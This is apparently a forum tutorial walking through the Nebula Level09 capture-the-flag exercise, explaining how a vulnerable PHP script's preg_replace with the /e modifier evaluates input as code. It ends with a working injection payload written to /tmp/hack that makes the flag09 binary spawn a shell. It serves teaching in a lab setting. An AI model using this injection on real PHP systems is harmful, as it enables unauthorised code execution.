How to pwned Nebula : Level09 - PHP preg_replace

ctf
nebula
vm
php
hacking

#1

#Exploit-Exercice : Nebula

##Level09 - PHP preg_replace

Hi everyone ! It’s been a long time since the last Tutorial :slight_smile: Today, this tutorial will focus on a vulnerable php application.

Let’s begin !

The source code

Nebula provides us the php source code of the vulnerable app :

<?php

function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>

Let’s break the code into small piece

n.b : the flag09 binary located in the /home/flag09 will run the php script

Understanding preg_replace and php variable


How does it work ?

We have two function in this php code

spam and markup

Here is the spam function :

function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}

This function will simply replace the content of the $email variable

if the regex find a “.”, the function will replace “.” with "dot"
if the regex find a “@”, the function will replace “@” with “AT”

example : [email protected] will output : darlene AT fsociety dot com

Now let’s dive into the markup function :

function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);

  return $contents;
}

the function markup have two arguments : filename, useme

Forget the useme variable, we will pass garbage data : (ex: asdf, fsociety, unicorn) because this variable is not used

filename is the path to our file name :slight_smile: as you can see in the first regex the function will search for a specific string

[email (.*)]

If a string looks like the regex in the preg_replace :
ex :

it will strip the string and execute the second part and pass it to spam
*ex:

and the spam command will strip these emails
ex :

  • darlene AT fsociety dot com
  • elio tAT fsociety dot com
  • tyrell AT e-corpdot com
  • gideon AT allsafedot com

Exploiting preg_replace

Here is the problem of this piece of code :

  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);

the /e will execute the second argument of the preg_replace function as a php expression

Let’s create our “hack file”

echo '[email {$filename}]' >/tmp/hack

Now when we run the flag09 binary the output will be :

/tmp/hack

Now let’s exploit it to get a shell

echo '[email {${system(sh)}]' >/tmp/hack

this will output the return value of the system function : A shell :slight_smile:

The next tutorial will cover Race Condition exploit :slight_smile:


(system) #2

This topic was automatically closed after 30 days. New replies are no longer allowed.